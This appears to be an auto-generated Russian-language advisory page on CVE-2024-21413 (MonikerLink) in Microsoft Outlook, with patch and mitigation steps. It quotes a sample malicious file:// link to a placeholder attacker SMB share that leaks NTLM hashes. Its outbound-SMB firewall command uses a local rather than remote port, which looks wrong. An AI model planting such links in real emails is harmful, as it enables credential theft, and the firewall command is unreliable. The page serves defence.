CVE-2024-21413

Microsoft Office Outlook

ВЫСОКАЯ ВЕРОЯТНОСТЬ
Дата обнаружения

2025-02-06

Официальное описание

Microsoft Outlook contains an improper input validation vulnerability that allows for remote code execution. Successful exploitation of this vulnerability would allow an attacker to bypass the Office Protected View and open in editing mode rather than protected mode.

🛡️
Технический анализ и план устранения

Суть уязвимости

CVE-2024-21413, также известная как MonikerLink, представляет собой критическую уязвимость в Microsoft Outlook (CVSS 9.8). Проблема заключается в некорректной валидации входных данных при обработке гиперссылок, использующих протокол file:// в сочетании со спецсимволом восклицательного знака !.

Злоумышленник может отправить специально сформированное письмо, содержащее ссылку вида <a href="file:///\\IP_ADDRESS\share\file.docx!anything">Click Me</a>. При клике на такую ссылку Outlook обходит механизм Protected View (защищенный просмотр). Это приводит к двум опасным сценариям: 1. Утечка NTLM-хешей: Клиент автоматически пытается аутентифицироваться на удаленном SMB-ресурсе. 2. Удаленное выполнение кода (RCE): Через механизм COM/OLE-объектов атакующий может выполнить произвольный код на целевой системе.

Как исправить

Основным и рекомендуемым способом устранения уязвимости является установка официальных обновлений безопасности от Microsoft, выпущенных в феврале 2024 года.

Для проверки наличия обновлений и принудительной установки через PowerShell (модуль PSWindowsUpdate):

Install-Module PSWindowsUpdate
Get-WindowsUpdate -KBArticleID KB5002564, KB5002557 -Install

Для Microsoft 365 Apps (Office Click-to-Run) необходимо запустить процесс обновления встроенной утилитой:

cd "C:\Program Files\Common Files\microsoft shared\ClickToRun"
.\OfficeC2RClient.exe /update user

Минимальные версии билдов с исправлением: - Microsoft 365 Apps (Current Channel): 2401 (Build 17231.20236) - Office LTSC 2021: 2108 (Build 14332.20651) - Office 2019: 1808 (Build 10407.20045)

Временные меры

Если немедленная установка патчей невозможна, следует применить следующие компенсирующие меры контроля:

  1. Блокировка исходящего SMB-трафика: Запретите исходящие соединения по порту TCP 445 на периметре сети, чтобы предотвратить утечку NTLM-хешей на внешние IP-адреса.
New-NetFirewallRule -DisplayName "Block Outbound SMB" -Direction Outbound -LocalPort 445 -Protocol TCP -Action Block

  1. Настройка групповых политик (GPO): Включите опцию "Restrict NTLM: Outgoing NTLM traffic to remote servers" (Ограничить NTLM: исходящий трафик NTLM на удаленные серверы) в значение Deny All.

  2. Использование Outlook Web Access (OWA): Переведите критических сотрудников на использование веб-версии Outlook, так как она не подвержена данной уязвимости, связанной с локальной обработкой Moniker-ссылок.

  3. Минимизация привилегий: Убедитесь, что пользователи не работают под учетными записями локальных администраторов, чтобы ограничить потенциальный ущерб в случае успешной эксплуатации RCE.

Рекомендации сформированы автоматически на основе баз знаний (CISA/NVD/ФСТЭК) и технической документации вендора. Всегда тестируйте патчи в песочнице перед продакшном.
← Вернуться к списку уязвимостей